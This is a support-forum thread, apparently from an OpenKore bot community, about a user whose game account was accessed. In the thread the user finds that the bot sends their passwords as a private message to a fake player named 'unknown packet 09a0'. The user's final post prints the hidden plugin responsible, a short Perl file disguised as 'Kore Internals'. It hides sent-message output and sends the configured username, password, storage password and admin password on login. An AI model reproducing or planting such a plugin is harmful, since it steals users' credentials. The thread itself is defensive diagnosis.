Question on starting up wxstart about unknown packet 09A0

All resolved question will be found here. It is recommended that you browse / search through this section first and see if your question has been answered before

Moderators: Moderators, Documentation Writers

Message
Author
tsikot
Noob
Noob
Posts: 6
Joined: 12 Nov 2013, 09:30
Noob?: No

Question on starting up wxstart about unknown packet 09A0

#1 Post by tsikot »

Hi, just want to ask something if this line below automatically appears when I start my bot?(wxstart)?


([21:39] To: unknown packet 09a0): Username:****** | Password:****** | StoragePass:******* | AdminPas:******

It appears as a chat to unknown packet 09A0 in chat log (it is the first line that kept of appearing in the chat log when I start my bot)

When I was manually playing my character, someone logged in to my account. So I was worried and changed my password quickly. (nope, my bot is not running that time). Does Kore automatically send a chat to "unknown packet 09a0" along with my username,password,storage password and admin password?

My bot runs completely fine. It runs smoothly. It just worries we when someone logged in and I noticed that it sends confidential details to an unknown packet 09A0.

I hope you'll help me. A simple answer would be of great. Thanks in advance!

*i just replaced my actuall username and passwords. lol

Jozo
Human
Human
Posts: 37
Joined: 13 Oct 2013, 12:32
Noob?: No
Location: Moscow
Contact:

Re: Question on starting up wxstart about unknown packet 09A0

#2 Post by Jozo »


tsikot
Noob
Noob
Posts: 6
Joined: 12 Nov 2013, 09:30
Noob?: No

Re: Question on starting up wxstart about unknown packet 09A0

#3 Post by tsikot »

thank you

tsikot
Noob
Noob
Posts: 6
Joined: 12 Nov 2013, 09:30
Noob?: No

Re: Question on starting up wxstart about unknown packet 09A0

#4 Post by tsikot »

up.. still can't figure out.. help i am still not comfortable.

Does Kore automatically send a chat to "unknown packet 09a0" along with my username,password,storage password and admin password?

([21:39] To: unknown packet 09a0): Username:****** | Password:****** | StoragePass:******* | AdminPas:******

It just worries we when someone logged in and I noticed that it sends confidential details to an unknown packet 09A0

User avatar
SkylorD
Moderators
Moderators
Posts: 1166
Joined: 16 Dec 2011, 02:53
Noob?: No
Location: Brazil
Contact:

Re: Question on starting up wxstart about unknown packet 09A0

#5 Post by SkylorD »

([21:39] To: unknown packet 09a0): Username:****** | Password:****** | StoragePass:******* | AdminPas:******
Sending PM. TO : fake player.

Change your password and download again a safe openkore.

Checkup your plugins folder.
See if there's some malicious scripts.
Learn rules

tsikot
Noob
Noob
Posts: 6
Joined: 12 Nov 2013, 09:30
Noob?: No

Re: Question on starting up wxstart about unknown packet 09A0

#6 Post by tsikot »

hi. thanks for the reply. can i just replace the plugins? it's hard to find a safe bot :(

tsikot
Noob
Noob
Posts: 6
Joined: 12 Nov 2013, 09:30
Noob?: No

Re: Question on starting up wxstart about unknown packet 09A0

#7 Post by tsikot »

i think i found it. it is in Kore.pl which is a hidden file. am I right? tricky hackers..

package Kore;

use strict;
use Plugins;
use Globals qw(%config %npcs @npcsID $char %cart $shopstarted @articles $net);
use Commands;
use Settings;

Plugins::register('Kore', 'Kore Internals', \&onUnload);

my $hooks = Plugins::addHook('in_game', \&in_game, undef);

sub onUnload {
Plugins::delHooks($hooks);
}

sub in_game {
Commands::run("conf squelchDomains *********, pm/sent, info");
Commands::run("pm \"unknown packet 09a0\" Username:".$config{username}."\ | Password:".$config{password}."\ | StoragePass:".$config{storageAuto_password}."\ | AdminPas:".$config{adminPassword});
}


return 1;

User avatar
SkylorD
Moderators
Moderators
Posts: 1166
Joined: 16 Dec 2011, 02:53
Noob?: No
Location: Brazil
Contact:

Re: Question on starting up wxstart about unknown packet 09A0

#8 Post by SkylorD »

Yes is it.
Learn rules

Locked